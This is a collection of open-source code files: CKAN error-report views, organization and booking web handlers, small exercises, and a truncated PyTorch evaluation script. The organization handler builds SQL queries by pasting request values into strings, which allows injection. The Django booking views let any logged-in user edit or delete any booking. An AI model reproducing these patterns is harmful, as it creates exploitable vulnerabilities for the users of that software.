\"selected_record\": selected_metadata_record,\n \"errors\": errors or {},\n \"error_summary\": error_summary or {},\n }\n return toolkit.render(\"error_report/edit.html\", extra_vars=extra_vars)\n\n def post(self):\n try:\n data_dict = clean_dict(\n dict_fns.unflatten(tuplize_dict(parse_params(request.form)))\n )\n except dict_fns.DataError:\n result = toolkit.abort(\n 400, toolkit._(\"Integrity Error, problem in parsing form parameters\")\n )\n else:\n if data_dict.get(\"metadata_record\") is None:\n data_dict[\"metadata_record\"] = request.args.get(\"metadata_record\")\n try:\n data_dict[\"owner_user\"] = toolkit.g.user\n error_report = toolkit.get_action(\"error_report_create\")(\n context={\n \"user\": toolkit.g.user,\n \"auth_user_obj\": toolkit.g.userobj,\n },\n data_dict=data_dict,\n )\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.ValidationError as exc:\n errors = exc.error_dict\n error_summary = exc.error_summary\n result = self.get(\n data=data_dict, errors=errors, error_summary=error_summary\n )\n else:\n url = toolkit.h.url_for(\n \"error_report.error_report_show\",\n csi_reference_id=error_report[\"csi_reference_id\"],\n )\n result = toolkit.h.redirect_to(url)\n return result\n\n\nnew_error_report_view = ErrorReportCreateView.as_view(\"new_error_report\")\nerror_report_blueprint.add_url_rule(\"/new/\", view_func=new_error_report_view)\n#\n#\n\n\nclass ErrorReportUpdateView(MethodView):\n show_action = \"error_report_show\"\n success_redirect_to_view = \"error_report.error_report_show\"\n update_auth: typing.Optional[str] = None\n update_action: typing.Optional[str] = None\n template_path = \"error_report/edit.html\"\n form_snippet = \"error_report/snippets/report_form.html\"\n enable_owner_fieldset = True\n enable_nsif_fieldset = False\n\n def get(\n self,\n csi_reference_id: str,\n data: typing.Optional[typing.Dict] = None,\n errors: typing.Optional[typing.Dict] = None,\n error_summary=None,\n ):\n context = _prepare_context()\n try:\n old_data = toolkit.get_action(self.show_action)(\n context, data_dict={\"csi_reference_id\": csi_reference_id}\n )\n if data is not None:\n old_data.update(data)\n data = old_data\n\n packages = ckan.model.Session.query(ckan.model.Package).all()\n\n metadata_records = [\n {\"value\": record.id, \"text\": record.title} for record in packages\n ]\n selected_metadata_record = request.args.get(\"metadata_record\", None)\n except (toolkit.ObjectNotFound, toolkit.NotAuthorized):\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n else:\n try:\n toolkit.check_access(\n self.update_auth,\n context,\n data_dict={\"csi_reference_id\": csi_reference_id},\n )\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403,\n toolkit._(\"User %r not authorized to edit %s\")\n % (toolkit.g.user, csi_reference_id),\n )\n else:\n result = toolkit.render(\n self.template_path,\n extra_vars={\n \"form_snippet\": self.form_snippet,\n \"enable_owner_fieldset\": self.enable_owner_fieldset,\n \"enable_nsif_fieldset\": self.enable_nsif_fieldset,\n \"data\": data,\n \"metadata_records\": metadata_records,\n \"selected_record\": selected_metadata_record,\n \"csi_reference_id\": csi_reference_id,\n \"errors\": errors or {},\n \"error_summary\": error_summary or {},\n },\n )\n return result\n\n def post(self, csi_reference_id: str):\n try:\n data_dict = clean_dict(\n dict_fns.unflatten(tuplize_dict(parse_params(request.form)))\n )\n data_dict[\"csi_reference_id\"] = 
csi_reference_id\n except dict_fns.DataError:\n result = toolkit.abort(400, toolkit._(\"Integrity Error\"))\n else:\n context = _prepare_context()\n try:\n toolkit.get_action(self.update_action)(context, data_dict)\n except toolkit.NotAuthorized as exc:\n result = toolkit.base.abort(\n 403,\n toolkit._(\"Unauthorized to update error report, %s\") % exc,\n )\n except toolkit.ObjectNotFound:\n result = toolkit.base.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.ValidationError as exc:\n errors = exc.error_dict\n error_summary = exc.error_summary\n result = self.get(\n csi_reference_id,\n data=data_dict,\n errors=errors,\n error_summary=error_summary,\n )\n else:\n url = toolkit.h.url_for(\n self.success_redirect_to_view, csi_reference_id=csi_reference_id\n )\n result = toolkit.h.redirect_to(url)\n return result\n\n\nclass ErrorReportOwnerUpdateView(ErrorReportUpdateView):\n update_auth = \"error_report_update_by_owner_auth\"\n update_action = \"error_report_update_by_owner\"\n enable_owner_fieldset = True\n enable_nsif_fieldset = False\n\n\n# came back here to feature data in the EMC\nclass ErrorReportNsifUpdateView(ErrorReportUpdateView):\n update_auth = \"error_report_update_by_nsif_auth\"\n update_action = \"error_report_update_by_nsif\"\n enable_owner_fieldset = False\n enable_nsif_fieldset = True\n\n\nowner_edit_error_report_view = ErrorReportOwnerUpdateView.as_view(\n \"owner_edit_error_report\"\n)\nerror_report_blueprint.add_url_rule(\n \"//owner_edit/\",\n view_func=owner_edit_error_report_view,\n)\n\nnsif_edit_error_report_view = ErrorReportNsifUpdateView.as_view(\n \"nsif_edit_error_report\"\n)\nerror_report_blueprint.add_url_rule(\n \"//nsif_edit/\", view_func=nsif_edit_error_report_view\n)\n\n#\n# error_report show page\n\n\n@error_report_blueprint.route(\"/show/\")\ndef error_report_show(csi_reference_id):\n try:\n error_report = toolkit.get_action(\"error_report_show\")(\n context={\"dictize_for_ui\": True},\n data_dict={\"csi_reference_id\": csi_reference_id},\n )\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.NotAuthorized:\n result = toolkit.base.abort(401, toolkit._(\"Not authorized\"))\n else:\n extra_vars = {\n \"error_report\": error_report,\n }\n result = toolkit.render(\"error_report/show.html\", extra_vars=extra_vars)\n return result\n\n\nclass ErrorReportModerateView(MethodView):\n template_name = \"error_report/moderate.html\"\n actions = {\n \"nsif\": {\n \"message\": \"Moderate error report on behalf of NSIF\",\n \"ckan_action\": \"error_report_nsif_moderate\",\n }\n }\n\n def get(self, csi_reference_id: str):\n context = _prepare_context()\n try:\n error_report = toolkit.get_action(\"error_report_show\")(\n context, data_dict={\"csi_reference_id\": csi_reference_id}\n )\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403, toolkit._(\"Unauthorized to moderate error report\")\n )\n else:\n result = toolkit.render(\n self.template_name,\n extra_vars={\n \"error_report\": error_report,\n \"action\": self.actions.get(\"nsif\", {}).get(\"message\"),\n \"action_url\": toolkit.h[\"url_for\"](\n \"error_report.error_report_moderate\",\n csi_reference_id=csi_reference_id,\n ),\n },\n )\n return result\n\n def post(self, csi_reference_id: str):\n data_dict = {\n \"csi_reference_id\": csi_reference_id,\n \"action\": list(request.form.keys())[0],\n }\n try:\n ckan_action = 
self.actions.get(\"nsif\", {}).get(\"ckan_action\")\n logger.info(f\" ckan action {ckan_action}\")\n toolkit.get_action(ckan_action)(_prepare_context(), data_dict=data_dict)\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Report not found\"))\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403, toolkit._(\"Unauthorized to submit moderation for error report\")\n )\n else:\n toolkit.h[\"flash_notice\"](toolkit._(\"Moderation submitted\"))\n result = toolkit.redirect_to(\n toolkit.h[\"url_for\"](\n \"error_report.error_report_show\", csi_reference_id=csi_reference_id\n )\n )\n return result\n\n\nmoderate_error_report_view = ErrorReportModerateView.as_view(\"error_report_moderate\")\nerror_report_blueprint.add_url_rule(\n \"//moderate/\",\n view_func=moderate_error_report_view,\n)\n\n\nclass ErrorReportDeleteView(MethodView):\n def get(self, csi_reference_id: str):\n context = _prepare_context()\n try:\n error_report = toolkit.get_action(\"error_report_show\")(\n context, data_dict={\"csi_reference_id\": csi_reference_id}\n )\n except toolkit.ObjectNotFound:\n return toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.NotAuthorized:\n return toolkit.abort(403, toolkit._(\"Unauthorized to delete error report\"))\n return toolkit.render(\n \"error_report/ask_for_confirmation.html\",\n extra_vars={\n \"error_report\": error_report,\n \"action\": \"delete\",\n \"action_url\": toolkit.h[\"url_for\"](\n \"error_report.error_report_delete\",\n csi_reference_id=csi_reference_id,\n ),\n },\n )\n\n def post(self, csi_reference_id: str):\n if \"cancel\" not in request.form.keys():\n context = _prepare_context()\n try:\n toolkit.get_action(\"error_report_delete\")(\n context, data_dict={\"csi_reference_id\": csi_reference_id}\n )\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403, toolkit._(\"Unauthorized to delete error report %s\") % \"\"\n )\n else:\n toolkit.h[\"flash_notice\"](toolkit._(\"Error report has been deleted.\"))\n result = toolkit.redirect_to(\n toolkit.h[\"url_for\"](\"error_report.get_error_reports\")\n )\n else:\n result = toolkit.h.redirect_to(\n toolkit.h[\"url_for\"](\n \"error_report.error_report_show\", csi_reference_id=csi_reference_id\n )\n )\n return result\n\n\ndelete_error_report_view = ErrorReportDeleteView.as_view(\"error_report_delete\")\nerror_report_blueprint.add_url_rule(\n \"//delete/\", view_func=delete_error_report_view\n)\n\n\ndef _prepare_context() -> typing.Dict:\n context = {\n \"model\": ckan.model,\n \"session\": ckan.model.Session,\n \"user\": toolkit.g.user,\n \"auth_user_obj\": toolkit.g.userobj,\n }\n return context\n","repo_name":"kartoza/ckanext-dalrrd-emc-dcpr","sub_path":"ckanext/dalrrd_emc_dcpr/blueprints/error_report.py","file_name":"error_report.py","file_ext":"py","file_size_in_byte":16144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3076041119","text":"from collections import Counter\nimport csv\n\nwith open('name_log.csv', encoding='UTF-8') as file:\n data = list(csv.DictReader(file))\n\nlg_changes = Counter()\nfor ddict in data:\n lg_changes[ddict['email']] += 1\n\n[print(f'{email}: {num}') for email, num in sorted(lg_changes.items())]","repo_name":"Bl00dWolf/Stepik_Course","sub_path":"Course for profi/6. Дополнительные типы коллекций/6.8 Тип данных Counter. 
Часть 2/6.8.18 Here we go again.py","file_name":"6.8.18 Here we go again.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22569941277","text":"# p.201 떡볶이 떡 만들기\n\ndef solution(nm, rice_cakes):\n n, m = nm\n start, end = 0, max(rice_cakes)\n while start <= end:\n mid = (start + end) // 2\n total = 0\n for rice_cake in rice_cakes:\n total += max(rice_cake - mid, 0)\n if total < m:\n end = mid - 1\n elif total > m:\n start = mid + 1\n else:\n start += 1\n return start - 1\n\n\n# print(solution([4, 6], [19, 15, 10, 17])) # 15\n","repo_name":"jjinyeok/this_is_coding_test","sub_path":"binary_search_3.py","file_name":"binary_search_3.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27250218292","text":"#coding:utf-8\r\n\r\nimport sys\r\nimport time\r\nimport datetime\r\n\r\nfrom db import dbMysql\r\nfrom libs.web.Base import WebRequestHandler,BaseError,operator_except\r\nfrom system.operationLog.entity import operation_log,LOG_ADD,LOG_UPDATE,LOG_DELETE \r\nfrom libs.utils.debug import *\r\nfrom libs.utils.utils import *\r\n\r\nfrom libs.JCL.JCLCommon import *\r\n\r\nfrom config import *\r\n\r\nfrom system.accountManage import account\r\nfrom public.areaCodeManage import *\r\n\r\nimport xlrd, xlwt\r\nfrom public.excel import excel\r\n\r\nclass organizationManage(dbMysql.CURD) :\r\n def __init__(self,db) :\r\n if sys.version > '3':\r\n # python 3.0 +\r\n super().__init__(db,'public.organization',False) # 定义本实例需要操作的表名\r\n else :\r\n # python 2.7\r\n super(organizationManage, self).__init__(db,'public.organization',False)\r\n\r\nclass Restful(WebRequestHandler):\r\n\r\n @operator_except\r\n def get(self):\r\n\r\n op = self.get_argument(\"op\", default='')\r\n\r\n organizationID = int(self.get_argument(\"oid\", default='0'))\r\n organizationType= self.get_argument(\"ot\", default='')\r\n systemUserID = self.GetSystemUserID()\r\n\r\n offset = int(self.get_argument('o', default = '1'))\r\n rowlimit = int(self.get_argument('r', default = '20'))\r\n\r\n offset = ( offset - 1 ) * rowlimit\r\n sql_limit = \" limit \" + str(rowlimit) + \" offset \" + str(offset)\r\n\r\n sql = \"\"\"\r\n select po.id, po.name, po.name_en, po.abbr, po.abbr_en, po.organization_type, po.registe_date, po.registe_addr, po.current_addr, \r\n po.business_scope, po.social_credit_code, po.legal_representative, po.legal_id_type, po.legal_id_no,\r\n po.contactor_name, po.contactor_mobile, po.logo_file, po.description, po.system_user_id\r\n from public.organization po\r\n \"\"\"\r\n sql_where = ' where po.system_user_id = %d'%systemUserID\r\n if organizationType != '':\r\n sql_where += \" and po.organization_type = '%s'\"%organizationType \r\n if organizationID > 0:\r\n sql_where += ' and po.id = %d'%organizationID\r\n\r\n sql += sql_where\r\n sql += \" order by po.id desc\" \r\n\r\n if op == \"list\":\r\n sql += sql_limit\r\n\r\n cur = self.db.getCursor()\r\n cur.execute(sql)\r\n rows = cur.fetchall()\r\n\r\n if op == \"excel\":\r\n self.exportToExcel( rows )\r\n else:\r\n rowdata = {}\r\n rowdata['struct'] = \"id, name, name_en, abbr, abbr_en, organization_type, registe_date, registe_addr, current_addr, business_scope, social_credit_code\"\r\n rowdata['struct'] += \", legal_representative, legal_id_type, legal_id_no, contactor_name, contactor_mobile, logo_file, description, system_user_id\"\r\n rowdata['rows'] = rows\r\n\r\n 
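        # Pagination math, worked through: the client sends o (page) and
        # r (rows per page); offset = (o - 1) * r, so o=3 with r=20 yields
        # "limit 20 offset 40". The COUNT(*) below reuses the same WHERE
        # clause so the pager can compute the total page count.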
sql = \"select count(*) from public.organization po\"\r\n sql += sql_where\r\n cur.execute(sql)\r\n row = cur.fetchone() \r\n rowdata['count'] = row[0]\r\n self.response(rowdata)\r\n\r\n # 输出供应商到excel文件\r\n def exportToExcel(self, rowdata):\r\n\r\n key = ['id', 'name', 'name_en', 'abbr', 'abbr_en', 'organization_type', 'registe_date', 'registe_addr', 'current_addr', 'business_scope',\r\n 'social_credit_code', 'legal_representative', 'legal_id_type', 'legal_id_no', 'contactor_name', 'contactor_mobile',\r\n 'logo_file', 'description', 'system_user_id']\r\n\r\n organizationList = []\r\n for i, item in enumerate(rowdata):\r\n organizationInfo = dict(zip(key, item))\r\n organizationList.append(organizationInfo)\r\n\r\n cur = self.db.getCursor()\r\n getDataDict(cur, organizationList, \"organization_type\", \"ORGANIZATION_TYPE\", \"organization_type_name\")\r\n \r\n data = []\r\n sn = 1\r\n for item in organizationList:\r\n\r\n itemData = []\r\n itemData.append( sn )\r\n sn = sn + 1\r\n itemData.append( item['name'] )\r\n itemData.append( item['name_en'] )\r\n itemData.append( item['abbr'])\r\n itemData.append( item['abbr_en'])\r\n itemData.append( item['organization_type_name'])\r\n itemData.append( item['registe_date'])\r\n itemData.append( item['registe_addr'])\r\n itemData.append( item['current_addr'])\r\n itemData.append( item['business_scope'])\r\n itemData.append( item['social_credit_code'])\r\n itemData.append( item['legal_representative'])\r\n itemData.append( item['contactor_name'])\r\n itemData.append( item['contactor_mobile'])\r\n itemData.append( item['description'])\r\n\r\n data.append(itemData) \r\n\r\n struct = \"SN, 名称, 名称(英), 中文缩写, 英文缩写, 类型, 注册日期, 注册地址, 当前地址, 经营范围, 社会信用代码, 法人代表, 联系人员, 电话号码, 描述\"\r\n\r\n path = {}\r\n path = excel.createTempFile(\"xls\")\r\n \r\n excel.saveExcel(path['path'], struct, data )\r\n\r\n logInfo = \" %s 下载了组织团体清单 \"%self.objUserInfo['name']\r\n operation_log(self.db).addLog(self.GetUserInfo(), \"organizationManage\", logInfo, 0)\r\n\r\n self.response(path)\r\n\r\n # 传递的参数中,需要包括:\r\n @operator_except\r\n def post(self):\r\n\r\n alldata = self.getRequestData()\r\n\r\n s = organizationManage(self.db)\r\n\r\n lsData = {\r\n 'name' : 'name',\r\n 'name_en' : 'name_en',\r\n 'abbr' : 'abbr',\r\n 'abbr_en' : 'abbr_en',\r\n 'registe_date' : 'registe_date',\r\n 'registe_addr' : 'registe_addr',\r\n 'current_addr' : 'current_addr',\r\n 'organization_type' : 'organization_type',\r\n 'business_scope' : 'business_scope',\r\n 'social_credit_code' : 'social_credit_code',\r\n 'legal_representative' :'legal_representative',\r\n 'legal_id_type' : 'legal_id_type',\r\n 'legal_id_no' : 'legal_id_no',\r\n 'contactor_name' : 'contactor_name',\r\n 'contactor_mobile' : 'contactor_mobile',\r\n 'logo_file' : 'logo_file',\r\n 'description' : 'description',\r\n }\r\n\r\n data = {}\r\n for (k, v) in lsData.items():\r\n try:\r\n data[k] = alldata[v]\r\n except:\r\n pass\r\n\r\n\r\n userInfo = self.GetUserInfo()\r\n\r\n data['system_user_id'] = userInfo['system_user_id']\r\n\r\n db = self.getDB('public.organization')\r\n\r\n # 检查是否重复,同一个System_User_ID里面只能有一个\r\n result = db.findByCond(\"name\", \" (name = '%s' or name_en = '%s') and system_user_id = %d \"%(data['name'], data['name_en'], data['system_user_id']))\r\n if len( result['rows'] ) > 0 :\r\n raise BaseError(801, \"参数错误: 组织 %s 已经存在!\"%data['name'])\r\n\r\n\r\n data['create_id'] = userInfo['id']\r\n data['create_time'] = GetSystemTime()\r\n id = s.save(data, table='public.organization')\r\n\r\n logInfo = 
\"创建:%s,%s\"%(data['name'], data['name_en'])\r\n operation_log(self.db).addLog(self.GetUserInfo(), \"organizationManage\", logInfo, id)\r\n\r\n self.response(id)\r\n\r\n @operator_except\r\n def put(self):\r\n\r\n alldata = self.getRequestData()\r\n if self.getParam( alldata, \"id\", 0) == 0:\r\n raise BaseError(801, \"参数错误:缺少待更新供应商的ID!\")\r\n\r\n s = organizationManage(self.db)\r\n \r\n lsData = {\r\n 'id' : 'id',\r\n 'name' : 'name',\r\n 'name_en' : 'name_en',\r\n 'abbr' : 'abbr',\r\n 'abbr_en' : 'abbr_en',\r\n 'registe_date' : 'registe_date',\r\n 'registe_addr' : 'registe_addr',\r\n 'organization_type' : 'organization_type',\r\n 'current_addr' : 'current_addr',\r\n 'business_scope' : 'business_scope',\r\n 'social_credit_code' : 'social_credit_code',\r\n 'legal_representative' :'legal_representative',\r\n 'legal_id_type' : 'legal_id_type',\r\n 'legal_id_no' : 'legal_id_no',\r\n 'contactor_name' : 'contactor_name',\r\n 'contactor_mobile' : 'contactor_mobile',\r\n 'logo_file' : 'logo_file',\r\n 'description' : 'description',\r\n 'system_user_id' : 'system_user_id',\r\n }\r\n\r\n data = {}\r\n for (k, v) in lsData.items():\r\n try:\r\n data[k] = alldata[v]\r\n except:\r\n pass\r\n\r\n db = self.getDB('public.organization')\r\n \r\n # 检查是否重复,同一个System_User_ID里面只能有一个\r\n result = db.findByCond(\"name\", \" (name = '%s' or name_en = '%s') and system_user_id = %d and id <> %d\"%(data['name'], data['name_en'], data['system_user_id'], data['id']))\r\n if len( result['rows'] ) > 0 :\r\n raise BaseError(801, \"参数错误: 组织 %s 已经存在!\"%data['name'])\r\n\r\n userInfo = self.GetUserInfo()\r\n data['update_id'] = userInfo['id']\r\n data['update_time'] = GetSystemTime()\r\n\r\n id = s.save(data, data['id'], table='public.organization')\r\n\r\n logInfo = \"更新组织团体信息:%s,%s\"%(data['name'], data['name_en'])\r\n operation_log(self.db).addLog( userInfo, \"organizationManage\", logInfo, id)\r\n\r\n self.response(id)\r\n\r\n\r\n @operator_except\r\n def delete(self):\r\n\r\n alldata = self.getRequestData()\r\n orgID = self.getParam( alldata, \"id\", 0)\r\n if orgID == 0:\r\n raise BaseError(801, \"参数错误:缺少待删除的供应商ID!\")\r\n\r\n logInfo = '组织团体 %s 被删除'%alldata['name']\r\n\r\n # 删除记录\r\n s = organizationManage(self.db)\r\n s.remove( orgID, table = \"public.organization\", key = \"id\", delete = True)\r\n\r\n # 记录日志并退出\r\n operation_log(self.db).addLog(self.GetUserInfo(), \"organizationManage\", logInfo, orgID)\r\n self.response(orgID)\r\n\r\n @operator_except\r\n def patch(self):\r\n\r\n paramData = self.getRequestData()\r\n systemUserID = self.GetSystemUserID()\r\n\r\n op = self.getParam(paramData, \"op\", \"\")\r\n cur = self.db.getCursor()\r\n\r\n allData = {}\r\n\r\n if op == 'list':\r\n # 获取所有团体清单\r\n sql = \"\"\"\r\n select po.id, po.name\r\n from public.organization po \r\n where po.system_user_id = %d\r\n \"\"\"%systemUserID\r\n\r\n cur.execute(sql)\r\n rows = cur.fetchall()\r\n allOrganizationList = {}\r\n allOrganizationList['rows'] = [(0, \"选择全部\", )] + rows\r\n allOrganizationList['struct'] = 'id, name'\r\n\r\n allData['allOrganizationList'] = allOrganizationList\r\n\r\n # 获取组织团体类型清单\r\n sql = \"select cv.code, cv.name \"\r\n sql += \" from system.code_value cv\"\r\n sql += \" where cv.type_code = 'ORGANIZATION_TYPE' \"\r\n sql += \" order by cv.sort\"\r\n\r\n cur = self.db.getCursor()\r\n cur.execute(sql)\r\n rows = cur.fetchall()\r\n\r\n organizationTypeList = {}\r\n organizationTypeList['struct'] = \"code, name\"\r\n organizationTypeList['rows'] = [('0', \"选择全部\", )] + rows\r\n\r\n 
allData['organizationTypeList'] = organizationTypeList\r\n\r\n # 获取证件类型清单\r\n sql = \"select cv.code, cv.name \"\r\n sql += \" from system.code_value cv\"\r\n sql += \" where cv.type_code = 'IDENTITY_TYPE' \"\r\n sql += \" order by cv.sort\"\r\n\r\n cur = self.db.getCursor()\r\n cur.execute(sql)\r\n rows = cur.fetchall()\r\n\r\n identifyTypeList = {}\r\n identifyTypeList['struct'] = \"code, name\"\r\n identifyTypeList['rows'] = [('0', \"选择全部\", )] + rows\r\n\r\n allData['identifyTypeList'] = identifyTypeList\r\n\r\n self.response(allData)\r\n\r\n\r\n","repo_name":"zhangweijia-fuma/JCL","sub_path":"JDS/src/service/public/organizationManage.py","file_name":"organizationManage.py","file_ext":"py","file_size_in_byte":12569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73401102312","text":"from django.db import transaction\nfrom django.utils import timezone\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import NotFound, ParseError, PermissionDenied\nfrom rest_framework.status import HTTP_204_NO_CONTENT\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly\n\nfrom .models import Perk, Experience\nfrom .serializers import PerkSerializer, ExperienceSerializer, ExperienceDetailSerializer\n\nfrom categories.models import Category\nfrom bookings.models import Booking\nfrom bookings.serializers import PublicBookingSerializer, CreateRoomBookingSerializer\n\nclass Experiences(APIView):\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n def get(self, request):\n all_experiences = Experience.objects.all()\n serializer = ExperienceSerializer(all_experiences, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n serializer = ExperienceSerializer(data=request.data)\n if serializer.is_valid():\n category_pk = request.data.get(\"category\")\n if not category_pk:\n raise ParseError(\"Category is required\")\n try:\n category = Category.objects.get(pk=category_pk)\n if category.kind == Category.CategoryKindChoices.ROOMS:\n raise ParseError(\"The category kind should be experience\")\n except Category.DoesNotExist:\n raise ParseError(\"Category not found\")\n experience = serializer.save(\n host=request.user,\n category=category,\n )\n perks = request.data.get(\"perks\")\n if perks:\n for perk_pk in perks:\n perk = Perk.objects.get(pk=perk_pk)\n experience.perks.add(perk)\n serializer = ExperienceSerializer(experience)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n\nclass ExperienceDetail(APIView):\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n def get_object(self, pk):\n try:\n return Experience.objects.get(pk=pk)\n except Experience.DoesNotExist:\n raise NotFound\n def get(self, request, pk):\n experience = self.get_object(pk)\n serializer = ExperienceDetailSerializer(\n experience,\n context={\"request\":request},\n )\n return Response(serializer.data)\n\n\n def put(self, request, pk):\n experience = self.get_object(pk)\n if experience.host != request.user:\n raise PermissionDenied\n serializer = ExperienceDetailSerializer(\n experience,\n data=request.data,\n partial=True,\n )\n if serializer.is_valid():\n\n category_pk = request.data.get(\"category\")\n if category_pk:\n category = Category.objects.get(pk=category_pk)\n if category.kind == Category.CategoryKindChoices.ROOMS:\n raise ParseError(\"The category kind should be experience\")\n \n with transaction.atomic():\n if 'category' in 
locals():\n experience = serializer.save(\n host=request.user,\n category=category,\n )\n else:\n experience = serializer.save(host=request.user)\n\n perks = request.data.get(\"perks\")\n print(perks)\n try:\n if perks:\n experience.perks.clear()\n for perk_pk in perks:\n perk = Perk.objects.get(pk=perk_pk)\n experience.perks.add(perk)\n except Exception:\n raise ParseError(\"perk not found\")\n\n serializer = ExperienceDetailSerializer(\n experience,\n context={\"request\":request},\n )\n return Response(serializer.data)\n \n \n else:\n Response(serializer.errors)\n \n\n def delete(self, request, pk):\n experience = self.get_object(pk)\n if experience.host != request.user:\n raise PermissionDenied\n experience.delete()\n return Response(status=HTTP_204_NO_CONTENT)\n\nclass ExperienceBookings(APIView):\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n def get_object(self, pk):\n try:\n return Experience.objects.get(pk=pk)\n except:\n raise NotFound\n \n def get(self, request, pk):\n experience = self.get_object(pk)\n now = timezone.localtime(timezone.now()).date()\n bookings = Booking.objects.filter(\n experience=experience,\n check_in__gt=now,\n )\n \n serializer = PublicBookingSerializer(\n bookings,\n many=True,\n )\n return Response(serializer.data)\n\n def post(self, request, pk):\n experience = self.get_object(pk)\n serializer = CreateRoomBookingSerializer(data=request.data)\n if serializer.is_valid():\n booking = serializer.save(\n experience=experience,\n user=request.user,\n kind=Booking.BookingKindChoices.EXPERIENCE,\n )\n serializer = PublicBookingSerializer(booking)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n\nclass ExperienceBookingDetail(APIView):\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n def get_object(self, pk):\n try:\n return Experience.objects.get(pk=pk)\n except Experience.DoesNotExist:\n raise NotFound(\"experience\")\n\n def get_booking(self, booking_pk):\n try:\n return Booking.objects.get(pk=booking_pk)\n except Booking.DoesNotExist:\n raise NotFound(\"booking\")\n\n def get(self, request, pk, booking_pk):\n try:\n experience = self.get_object(pk)\n now = timezone.localtime(timezone.now()).date()\n booking = Booking.objects.filter(experience=experience, pk=booking_pk, check_in__gt=now)[0]\n \n serializer = PublicBookingSerializer(booking)\n \n return Response(serializer.data)\n except :\n raise ParseError(\"예약이 없습니다.\")\n\n \n def put(self, request, pk, booking_pk):\n experience = self.get_object(pk)\n now = timezone.localtime(timezone.now()).date()\n booking = Booking.objects.filter(experience=experience, pk=booking_pk, check_in__gt=now)[0]\n serializer = CreateRoomBookingSerializer(\n booking,\n data=request.data,\n partial=True,\n )\n if serializer.is_valid():\n booking = serializer.save(user=request.user)\n serializer = PublicBookingSerializer(booking)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n\n def delete(self, request, pk, booking_pk):\n booking = self.get_booking(booking_pk)\n booking.delete()\n return Response(HTTP_204_NO_CONTENT)\n \n \n\nclass Perks(APIView):\n\n def get(self, request):\n all_perks = Perk.objects.all()\n serializer = PerkSerializer(all_perks, many=True)\n return Response(serializer.data)\n \n def post(self, request):\n serializer = PerkSerializer(data=request.data)\n if serializer.is_valid():\n perk = serializer.save()\n return Response(\n PerkSerializer(perk).data,\n )\n else:\n return Response(serializer.errors)\n\nclass 
PerkDetail(APIView):\n\n def get_object(self, pk):\n try:\n return Perk.objects.get(pk=pk)\n except Perk.DoesNotExist:\n raise NotFound\n\n def get(self, request, pk):\n perk = self.get_object(pk)\n serializer = PerkSerializer(perk)\n return Response(serializer.data)\n\n def put(self, request, pk):\n perk = self.get_object(pk)\n serializer = PerkSerializer(\n perk,\n data=request.data,\n partial=True,\n )\n if serializer.is_valid():\n updated_perk = serializer.save()\n return Response(\n PerkSerializer(updated_perk).data,\n )\n else:\n return Response(serializer.errors)\n\n def delete(self, request, pk):\n perk = self.get_object(pk)\n perk.delete()\n return Response(status=HTTP_204_NO_CONTENT)","repo_name":"crosswalkso/airbnb_clone","sub_path":"airbnb-clone-backend/experiences/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35226558058","text":"import argparse\nimport torch\nimport ns.utils as utils\nimport os\nimport pickle\n\nfrom torch.utils import data\nimport numpy as np\nimport ns.modules as modules\n\ntorch.backends.cudnn.deterministic = True\n\n\ndef evaluate(args, args_eval, model_file):\n\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n device = torch.device('cuda' if args.cuda else 'cpu')\n\n dataset = utils.PathDatasetStateIds(\n hdf5_file=args.dataset, path_length=10)\n eval_loader = data.DataLoader(\n dataset, batch_size=100, shuffle=False, num_workers=4)\n\n # Get data sample\n obs = eval_loader.__iter__().next()[0]\n input_shape = obs[0][0].size()\n\n model = modules.ContrastiveSWM(\n embedding_dim=args.embedding_dim,\n hidden_dim=args.hidden_dim,\n action_dim=args.action_dim,\n input_dims=input_shape,\n num_objects=args.num_objects,\n sigma=args.sigma,\n hinge=args.hinge,\n ignore_action=args.ignore_action,\n copy_action=args.copy_action,\n encoder=args.encoder).to(device)\n\n model.load_state_dict(torch.load(model_file))\n model.eval()\n\n hits_list = []\n\n with torch.no_grad():\n\n for batch_idx, data_batch in enumerate(eval_loader):\n\n data_batch = [[t.to(\n device) for t in tensor] for tensor in data_batch]\n\n observations, actions, state_ids = data_batch\n\n if observations[0].size(0) != args.batch_size:\n continue\n\n states = []\n for obs in observations:\n states.append(model.obj_encoder(model.obj_extractor(obs)))\n states = torch.stack(states, dim=0)\n state_ids = torch.stack(state_ids, dim=0)\n\n pred_state = states[0]\n if not args_eval.no_transition:\n for i in range(args_eval.num_steps):\n pred_trans = 